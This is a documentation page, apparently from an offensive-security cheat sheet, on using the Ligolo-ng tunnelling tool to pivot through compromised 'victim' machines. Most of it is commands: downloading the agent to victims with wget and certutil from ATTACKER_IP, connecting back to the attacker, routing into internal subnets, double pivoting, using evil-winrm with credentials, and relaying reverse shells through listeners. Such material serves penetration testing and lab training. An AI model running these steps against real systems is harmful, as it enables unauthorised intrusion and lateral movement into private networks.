Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Ligolo-ng creates encrypted tunnels using a TUN interface. No SOCKS proxy needed — traffic routes natively through the kernel. Faster and more stable than chisel/proxychains.
| Component | Runs on | Description |
|---|
| Proxy | Attacker | Manages tunnels and routes |
| Agent | Victim | Connects back to proxy |
Download
GitHub
# Latest release
https://github.com/nicocha30/ligolo-ng/releases
proxy (attacker) and agent (victim). Match OS and architecture.
Build from source
go install github.com/nicocha30/ligolo-ng/cmd/proxy@latest
go install github.com/nicocha30/ligolo-ng/cmd/agent@latest
Setup — Attacker
Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
Start proxy
Default listener: 0.0.0.0:11601
Custom port:
./proxy -selfcert -laddr 0.0.0.0:443
Setup — Victim
Transfer agent
# From attacker
python3 -m http.server 80
# On victim (Linux)
wget http://ATTACKER_IP/agent -O /tmp/agent && chmod +x /tmp/agent
# On victim (Windows)
certutil -urlcache -f http://ATTACKER_IP/agent.exe agent.exe
Connect back
Linux:
./agent -connect ATTACKER_IP:11601 -ignore-cert
agent.exe -connect ATTACKER_IP:11601 -ignore-cert
Start Tunnel
In proxy console:
Select the active session, then:
Add route to internal network
sudo ip route add 172.16.0.0/24 dev ligolo
nmap -sn 172.16.0.0/24
curl http://172.16.0.1
evil-winrm -i 172.16.0.5 -u admin -p password
Double Pivot
Reach a third network through two compromised machines.
Scenario
Attacker → Victim1 (10.10.10.0/24 + 172.16.0.0/24) → Victim2 (172.16.0.0/24 + 192.168.1.0/24)
Step 1 — First pivot (already done)
sudo ip route add 172.16.0.0/24 dev ligolo
Step 2 — Upload agent to Victim2
Use listener (see below) or transfer through Victim1.
Step 3 — Add listener on Victim1
In proxy console, select Victim1 session:
» listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
Step 4 — Connect Victim2 agent through Victim1
On Victim2:
./agent -connect 172.16.0.X:11601 -ignore-cert
Step 5 — Route third network
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up
sudo ip route add 192.168.1.0/24 dev ligolo2
Port Forwarding (Listener)
Expose attacker port through victim. Useful for reverse shells and file transfer through pivot.
Reverse shell through pivot
In proxy console:
» listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
File server through pivot
» listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
Victim1_IP:8080.
List active listeners
Remove listener
Useful Commands (Proxy Console)
| Command | Description |
|---|
session | List/select sessions |
start | Start tunnel on selected session |
stop | Stop active tunnel |
listener_add | Add port forward |
listener_list | Show active listeners |
listener_stop | Remove listener |
ifconfig | Show victim network interfaces |
Troubleshooting
| Problem | Fix |
|---|
| No route to host | Check ip route — add route for internal subnet to ligolo interface |
| Agent won’t connect | Firewall blocking outbound? Try port 443: -laddr 0.0.0.0:443 |
| Tunnel starts but no traffic | Wrong TUN interface — verify with ip route and start --tun ligoloX |
| DNS not resolving | Add internal DNS to /etc/resolv.conf or use IPs directly |